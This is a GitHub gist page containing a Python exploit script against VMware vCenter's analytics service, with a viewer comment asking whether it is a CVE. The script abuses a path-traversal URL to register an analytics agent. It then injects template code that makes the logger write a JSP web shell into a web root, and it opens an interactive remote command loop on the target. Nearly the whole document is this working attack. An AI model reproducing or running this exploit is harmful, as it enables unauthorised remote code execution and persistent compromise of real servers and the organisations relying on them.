Created
September 28, 2021 16:05
-
-
Save testanull/5bb925179c4695e51ca400b7370bc252 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def id_generator(size=6, chars=string.ascii_lowercase + string.digits): | |
return ''.join(random.choice(chars) for _ in range(size)) | |
def escape(_str): | |
_str = _str.replace("&", "&") | |
_str = _str.replace("<", "<") | |
_str = _str.replace(">", ">") | |
_str = _str.replace("\"", """) | |
return _str | |
def run_shell(url, pwd, cmd): | |
burp0_url = url | |
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} | |
burp0_data = {pwd: cmd.strip()} | |
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content | |
ct = ct.split('<pre>')[1].split('</pre>')[0] | |
return ct | |
def createAgent(url, agent_name): | |
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" } | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False) | |
pwd = id_generator(6) | |
agent_name = id_generator(6) | |
shell_name = id_generator(6)+".jsp" | |
manifestData = """<manifest recommendedPageSize="500"> | |
<request> | |
<query name="vir:VCenter"> | |
<constraint> | |
<targetType>ServiceInstance</targetType> | |
</constraint> | |
<propertySpec> | |
<propertyNames>content.about.instanceUuid</propertyNames> | |
<propertyNames>content.about.osType</propertyNames> | |
<propertyNames>content.about.build</propertyNames> | |
<propertyNames>content.about.version</propertyNames> | |
</propertySpec> | |
</query> | |
</request> | |
<cdfMapping> | |
<indepedentResultsMapping> | |
<resultSetMappings> | |
<entry> | |
<key>vir:VCenter</key> | |
<value> | |
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping"> | |
<resourceItemToJsonLdMapping> | |
<forType>ServiceInstance</forType> | |
<mappingCode><![CDATA[ | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s") | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions() | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(false) | |
$GLOBAL-logger.info('<%%@ page import="java.util.*,java.io.*"%%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><%%if (request.getParameter("%s") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("%s")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%%></pre></BODY></HTML>') | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/var/log/vmware/analytics/analytics.log") | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions() | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(true) | |
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())## | |
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")## | |
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))## | |
$obj.addProperty("OSTYPE", "asdasda")## | |
$obj.addProperty("BUILD", $content-about-build)## | |
$obj.addProperty("VERSION", $content-about-version)##]]> | |
</mappingCode> | |
</resourceItemToJsonLdMapping> | |
</value> | |
</value> | |
</entry> | |
</resultSetMappings> | |
</indepedentResultsMapping> | |
</cdfMapping> | |
<requestSchedules> | |
<schedule interval="1h"> | |
<queries> | |
<query>vir:VCenter</query> | |
</queries> | |
</schedule> | |
</requestSchedules> | |
</manifest>""" % (shell_name, pwd, pwd) | |
target = sys.argv[1] | |
print "Target: "+ target | |
print "Creating Agent (of SHIELD) ..." | |
createAgent(target, agent_name) | |
print "Collecting Agent (of SHIELD) ..." | |
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"}) | |
print "Success!" | |
print "Shell: " + target+"/idm/..;/"+shell_name | |
print "Pwd: "+ pwd | |
print "Launching pseudo shell ..." | |
while True: | |
cmd = raw_input("/remote_shell/# ").strip() | |
if(cmd =="quit"): | |
sys.exit(-1) | |
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd) | |
time.sleep(1) | |
print(output) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Is this a CVE?